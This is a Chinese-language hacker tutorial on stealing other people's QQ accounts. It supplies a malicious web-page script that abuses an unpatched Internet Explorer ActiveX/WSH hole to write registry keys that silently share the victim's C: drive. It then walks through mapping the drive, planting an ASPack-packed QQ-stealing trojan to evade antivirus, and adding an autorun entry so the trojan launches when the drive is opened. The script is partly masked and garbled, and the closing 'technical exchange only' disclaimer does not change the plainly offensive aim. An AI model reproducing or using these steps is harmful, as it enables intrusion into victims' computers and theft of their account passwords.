黑客通过网页窃取QQ方法解析

要想偷别人的QQ，方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是：在你的网站网页中加入如下内容的代码：
<script language=Java Script>
e("<APPLET HEIGHT=0 WIDTH=0 code=veXComponent></APPLET>");
function f()
{*********************];
LSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
telnstance()
Shl=bject()   rite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Flafgs",302,"REG_DWORD");
rite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Type",0,"REG_DWORD");
rite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Path","C:");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>

上面的代码大家一定很容易读懂，简单说来就是通过修改对方注册表中的键值，把对方的C盘共享出来，如果想让对方的其他盘都共享请自行设置。

述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外壳对象。WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制，它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行，就象执行批处理一样。以“rite”开头的这几句代码的作用是写入浏览者的注册表，就是它们使得对方的硬盘被共享的。把“Flags”的键值设为00000302可以隐藏共享，使对方无法发现，非常隐蔽。

网页做好后，把它上传你的主页空间，骗他浏览你的网页（就看你的嘴皮子功夫了），如果对方的IE没有打补丁（网上这样的电脑有很多），就可以把他的C盘共享出来。整个方法的原理就是把veXComponent对象嵌入<APPLET>标记中，这样会导致任意创建和解释执行ActiveX对象，使我们可以创建任意文件、运行程序、写注册表。未打补丁的IE，在打开含有上述代码的网页时不会有任何警告，我们就是利用这个漏洞把对方的硬盘被共享出来。

等对方中招后，就把对方的硬盘映射过来，可以使用net use命令，也可以使用网络刺客II等软件。下一步可以给对方植入一个盗QQ的软件，比方说QQ杀手等，注意一定要用ASPack或其他加壳软件给木马加壳（其实就是另类“压缩”），防止杀毒软件发现。

最后，打开记事本键入以下内容：

[AutoRun]
open=

保存为，其中的为木马文件。把和一起拷到对方某分区的根目录下。这样，只要他双击该分区就会中木马！这样可以大大的增加木马运行的主动性！须知许多人现在都非常警惕，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。

以后，你就等着用邮箱收信收对方的QQ密码吧。

注意，本文只是技术交流，大家不要随意盗取别人的QQ。同时为了保障安全我们没有完全刊登源代码。敬请原谅！